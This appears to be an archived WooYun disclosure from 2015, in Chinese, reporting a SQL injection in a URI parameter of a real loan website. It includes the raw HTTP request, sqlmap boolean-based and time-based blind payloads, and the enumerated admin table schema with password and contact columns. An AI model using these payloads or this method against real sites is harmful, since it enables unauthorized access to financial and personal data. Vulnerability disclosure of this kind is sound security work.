乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-22: 细节已通知厂商并且等待厂商处理中 2015-07-22: 厂商已经确认,细节仅向厂商公开 2015-08-01: 细节向核心白帽子及相关领域专家公开 2015-08-11: 细节向普通白帽子公开 2015-08-21: 细节向实习白帽子公开 2015-09-05: 细节向公众公开
好在是布尔型盲注,跑的速度还行。表里各种admin amount
注入点:
GET /list/index/city/beijing*/xd_type/gouche/money/10/month/12.html HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://open.haodai.com:80/Cookie: PHPSESSID=gc4u5iaklethl5v2c7ap443562; city=beijing; LANDING_PAGE=http%3A%2F%2Fopen.haodai.com%2F; desktop=0; REFERER=open.haodai.com; SOURCE_URL=http%3A%2F%2Fopen.haodai.com%2FHost: open.haodai.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://open.haodai.com:80/list/index/city/beijing') AND 2827=2827 AND ('IkuO'='IkuO/xd_type/gouche/money/10/month/12.html Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://open.haodai.com:80/list/index/city/beijing') AND (SELECT * FROM (SELECT(SLEEP(5)))WiVp) AND ('uRUa'='uRUa/xd_type/gouche/money/10/month/12.html---back-end DBMS: MySQL 5.0.12available databases [2]:[*] hd[*] information_schema
user:
back-end DBMS: MySQL 5.0.12current user: '[email protected].%'
admin表:
back-end DBMS: MySQL 5.0.12Database: hdTable: admin[24 columns]+--------------+-----------------------+| Column | Type |+--------------+-----------------------+| agent_num | char(12) || agent_passwd | varchar(16) || agent_phone | varchar(16) || auth | varchar(1024) || citys | text || citys_iued | text || email | varchar(255) || id | int(10) unsigned || isreadtj | tinyint(1) unsigned || iutypes | text || menuid | smallint(5) unsigned || name | varchar(32) || pwd | char(60) || pwd_key | varchar(32) || qq | char(11) || relation | int(10) unsigned || role | varchar(10) || stat | tinyint(3) unsigned || tel | char(11) || tquin | int(11) unsigned || type | tinyint(3) unsigned || weixin | char(32) || xdtypes | text || zone_id | mediumint(8) unsigned |+--------------+-----------------------+
太晚了,具体的一些敏感信息就不跑了,毕竟是金融站。
这个你们更专业
危害等级:高
漏洞Rank:20
确认时间:2015-07-22 10:38
多谢
暂无